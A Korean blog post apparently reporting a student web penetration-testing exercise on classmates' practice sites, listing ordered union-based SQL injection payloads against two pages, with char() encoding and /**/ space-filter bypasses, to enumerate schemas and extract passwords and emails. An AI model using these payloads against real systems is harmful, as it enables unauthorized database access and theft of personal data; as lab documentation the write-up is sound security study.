'Hack Project' 카테고리의 글 목록

Hack Project

모의해킹 프로젝트(#1) 2023.03.09

모의해킹 프로젝트(#1)

Box Maker 2023. 3. 9. 12:39

2023. 3. 9. 12:39

- 프로젝트 설명

지난 한달간 진행했던 웹 모의해킹 프로젝트는 같이 공부한 학생들이 만든 웹 사이트를 공유해서 서로 모의해킹을 하고 결과보고서를 작성하는 프로젝트입니다.
많은 취약점들이 있지만 취약점 항목별로 1개씩만 기재하겠습니다

1. SQL Injection

1) 비회원 게시판

search_result.php페이지에서 catgo파라미터에 해당 취약점이 발견되었습니다.
해당 취약점이 발견된 페이지에서 URL 주소창에 다음과 같은 파라미터를 순서대로 전송해 필요한 정보를 획득한 뒤 데이터를 추출 및 변조합니다.

char(114,101,100) union select 1,2,3,4,5,6,7,8,9%23

char(114,101,100) union select 1,database(),3,4,5,6,7,8,9%23

char(114,101,100) union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables where table_schema=char(98,97,115,105,99,95,100,98)%23

char(114,101,100) union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(81,78,65,98,111,97,114,100)%23

char(114,101,100) union select 1,pwd,3,4,5,6,7,8,9 from QNAboard%23

2) 주소 검색창

address_server.php 페이지에서 해당 취약점이 발견되었습니다.
해당 취약점이 발견된 페이지에서 주소 검색창에 다음과 같은 파라미터를 순서대로 전송해 필요한 정보를 획득한 뒤 데이터를 추출 및 변조합니다.
해당 페이지에선 공백이 필터링 되어있기 때문에 /**/로 공백을 우회할 수 있습니다.

1%'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,141,51,6,17,18,19,20,21,22,23,24,25,26#

1%'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,141,51,6,17,18,19,20,21,22,23,24,25,26#

1%'/**/union/**/select/**/1,table_name,3,4,5,6,7,8,9,10,11,12,13,141,51,6,17,18,19,20,21,22,23,24,25,26/**/from/**/information_schema.tables/**/where/**/table_schema='basic_db'#

1%'/**/union/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,141,51,6,17,18,19,20,21,22,23,24,25,26/**/from/**/information_schema.columns/**/where/**/table_name='basic_table'#

1%'/**/union/**/select/**/1,db_email,3,4,5,6,7,8,9,10,11,12,13,141,51,6,17,18,19,20,21,22,23,24,25,26/**/from/**/basic_table#

데이터 추출은 개인정보가 담겨있어 컬럼이름을 출력하는 화면으로 대체했습니다.